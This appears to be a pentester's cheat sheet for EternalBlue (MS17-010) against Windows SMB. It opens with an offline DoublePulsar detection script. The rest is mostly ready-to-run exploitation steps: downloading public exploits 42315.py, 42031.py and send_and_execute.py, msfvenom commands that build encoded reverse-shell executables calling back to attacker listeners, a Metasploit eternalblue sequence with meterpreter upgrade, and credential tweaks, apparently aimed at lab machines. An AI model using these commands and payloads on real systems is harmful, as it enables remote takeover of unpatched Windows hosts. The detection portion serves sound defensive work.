Eternal Blue - Exploits
Double Pulsar
- A sophisticated kernel-mode backdoor implant that serves as a loading dock for other exploits and payloads
- RAM-resident implant: it lives only in memory and does not survive a reboot
- Once installed on the victim, it can receive additional malware and remote commands over the same SMB connection that was used to plant it
- A variant of the implant also exists for RDP
- Here is an example detection script
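The detection logic used by the public DoublePulsar scanners, written out as an added offline example (this is not the page's missing script, nor code from any of the projects referenced here). The check is simple: after an anonymous SESSION_SETUP_ANDX and a TREE_CONNECT_ANDX to IPC$, the scanner sends an SMB1 TRANS2 SESSION_SETUP request with Multiplex ID 0x41. A clean host echoes MID 0x41 back with STATUS_NOT_IMPLEMENTED; an infected host answers with MID 0x51. The code below builds that probe, parses SMB1 headers, and classifies replies. The negotiate/session/tree-connect exchange is not performed, the header flag and PID values in the probe are typical ones (an assumption, not mandated by the implant), and both replies are constructed, not captured.

```python
"""
DoublePulsar "ping" detection, offline. Sends nothing; builds the TRANS2
SESSION_SETUP probe and classifies constructed replies by Multiplex ID.
"""
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
TRANS2_SESSION_SETUP = 0x000E
PROBE_MID = 0x41              # Multiplex ID the probe is sent with
IMPLANT_MID = 0x51            # Multiplex ID DoublePulsar answers with
STATUS_NOT_IMPLEMENTED = 0xC0000002


def strip_netbios(data):
    """Drop the 4-byte NetBIOS session header if present (type 0x00 + 3-byte length)."""
    if len(data) >= 4 and data[0] == 0x00:
        length = int.from_bytes(data[1:4], "big")
        return data[4:4 + length]
    return data


def parse_smb1_header(data):
    """Parse the fixed 32-byte SMB1 header into a dict (MS-CIFS layout)."""
    data = strip_netbios(data)
    if len(data) < 32 or data[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    command, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", data, 4)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", data, 24)
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "signature": data[14:22], "tid": tid, "pid": (pid_high << 16) | pid_low,
            "uid": uid, "mid": mid}


def build_trans2_session_setup_probe(uid, tid, mid=PROBE_MID, timeout=0):
    """Build the NetBIOS-framed TRANS2 SESSION_SETUP probe (12 zero parameter
    bytes, no data). uid/tid come from the SESSION_SETUP_ANDX / TREE_CONNECT_ANDX
    to IPC$ that this offline example does not perform. Flags 0x18 / Flags2
    0xC001 / PID 0xFEFF are typical client values (assumption)."""
    header = (SMB1_MAGIC
              + struct.pack("<BIBHH", SMB_COM_TRANSACTION2, 0, 0x18, 0xC001, 0)
              + b"\x00" * 8          # SecurityFeatures (signature), unused
              + b"\x00\x00"          # Reserved
              + struct.pack("<HHHH", tid, 0xFEFF, uid, mid))
    param_count = 12
    param_offset = 32 + 1 + 30 + 2 + 1   # header + WordCount + 15 words + ByteCount + pad = 66
    words = struct.pack("<HHHHBBHIHHHHHBBH",
                        param_count, 0,                 # TotalParameterCount, TotalDataCount
                        1, 0,                           # MaxParameterCount, MaxDataCount
                        0, 0,                           # MaxSetupCount, Reserved1
                        0, timeout,                     # Flags, Timeout
                        0,                              # Reserved2
                        param_count, param_offset,      # ParameterCount, ParameterOffset
                        0, param_offset + param_count,  # DataCount, DataOffset
                        1, 0,                           # SetupCount, Reserved3
                        TRANS2_SESSION_SETUP)           # Setup[0]
    payload = b"\x00" + b"\x00" * param_count           # pad byte + zeroed parameters
    smb = header + bytes([15]) + words + struct.pack("<H", len(payload)) + payload
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def classify_probe_reply(reply, sent_mid=PROBE_MID):
    """Classify the reply to the probe: 'infected', 'clean' or 'unexpected'."""
    try:
        hdr = parse_smb1_header(reply)
    except ValueError:
        return "unexpected"
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "unexpected"
    if hdr["mid"] == IMPLANT_MID:      # implant rewrites the MID to 0x51
        return "infected"
    if hdr["mid"] == sent_mid:         # normal server echoes the MID it was sent
        return "clean"
    return "unexpected"


def _constructed_reply(mid, status=STATUS_NOT_IMPLEMENTED):
    """Constructed header-only TRANS2 reply for the offline demo (not a real capture)."""
    smb = (SMB1_MAGIC
           + struct.pack("<BIBHH", SMB_COM_TRANSACTION2, status, 0x98, 0xC001, 0)
           + b"\x00" * 8 + b"\x00\x00"
           + struct.pack("<HHHH", 0x0800, 0xFEFF, 0x0800, mid)
           + b"\x00" + b"\x00\x00")    # WordCount 0, ByteCount 0
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


CLEAN_REPLY = _constructed_reply(PROBE_MID)
INFECTED_REPLY = _constructed_reply(IMPLANT_MID)

if __name__ == "__main__":
    probe = build_trans2_session_setup_probe(uid=0x0800, tid=0x0800)
    print("probe: %d bytes, MID 0x%02x" % (len(probe), parse_smb1_header(probe)["mid"]))
    for name, reply in (("clean", CLEAN_REPLY), ("infected", INFECTED_REPLY)):
        print("%-8s reply -> %s" % (name, classify_probe_reply(reply)))
```

To turn this into a live check, send the probe over an authenticated IPC$ session (the same negotiate/login/tree-connect flow that mysmb.py and impacket perform) and feed the raw reply to classify_probe_reply(). Treat "infected" as a confirmed compromise, not merely as "vulnerable": someone has already exploited MS17-010 on that host.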
42315.py
- Does not seem to work against Windows XP
- This is worawit's zzz_exploit.py: it needs a named pipe it is allowed to open, so supply credentials when anonymous login fails. Out of the box its smb_pwn() only drops C:\pwned.txt; edit that function to run your own payload
# Get mysmb module
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
# Install dependencies. The script is Python 2; recent impacket releases
# are Python 3 only, so pin one that still supports 2.7
virtualenv -p python2 virtualenv_eternalblue
source virtualenv_eternalblue/bin/activate
pip install impacket==0.9.20
searchsploit -m 42315.py
# Optional - set credentials at the top of the script
# (use this if anonymous login doesn't work)
egrep '^(USER|PASS)' 42315.py
USERNAME = 'Bob'
PASSWORD = '!P@$$W0rD!123'
# Run
python 42315.py 10.10.82.56
42031.py
- Does not seem to work against Windows XP
- Also crashes "Windows 7 Professional 7601 Service Pack 1" (HTB Blue)
# Set up the virtualenv as for 42315.py
searchsploit -m 42031.py
# Update credentials in the script
grep login_standard 42031.py
conn.login_standard('Bill', 'Juw4nnaM4n420696969!$$$')
# Generate the payload file. windows/shell/reverse_tcp is a staged payload, so
# catch it with exploit/multi/handler (same payload, LHOST and LPORT), not plain
# netcat; for a netcat listener use the stageless windows/shell_reverse_tcp instead
msfvenom -p windows/shell/reverse_tcp LHOST=10.11.40.33 LPORT=4444 -e x86/shikata_ga_nai -f exe -o eternalblue.exe
# Run
python 42031.py 10.10.177.9 eternalblue.exe
# NOTE: This doesn't work against Windows Server 2016
Metasploit
- Seems the most stable
# Confirm the target is vulnerable to MS17-010 first (auxiliary/scanner/smb/smb_ms17_010,
# which also reports an existing DoublePulsar infection), then use Metasploit.
# NOTE: if this fails the first time, run it a couple more times.
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts 10.10.10.13
msf> set lhost tun0
msf> set payload windows/x64/shell/reverse_tcp
msf> run
# Try upgrading to a meterpreter shell: sessions -u <id>
# (runs post/multi/manage/shell_to_meterpreter against the session)
send_and_execute.py
- Versions tested:
  - Windows 7 Professional 7601 Service Pack 1 (HTB Blue)
- Get mysmb.py from worawit's MS17-010 repo (URL above) and place it next to the script
- Generate the payload. It is stageless (shell_reverse_tcp), so a plain netcat listener can catch it
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
- Open a netcat listener on LPORT (4444 here)
- Run send_and_execute.py (from helviojunior's MS17-010 fork, https://github.com/helviojunior/MS17-010). The target may be an IP or a hosts entry; "legacy" below is a hosts entry
python send_and_execute.py legacy ms17-010.exe
Troubleshooting
- If you get permission errors on named pipes, try an anonymous login: set the username to a single backslash and leave the password blank
USERNAME = '\\'
PASSWORD = ''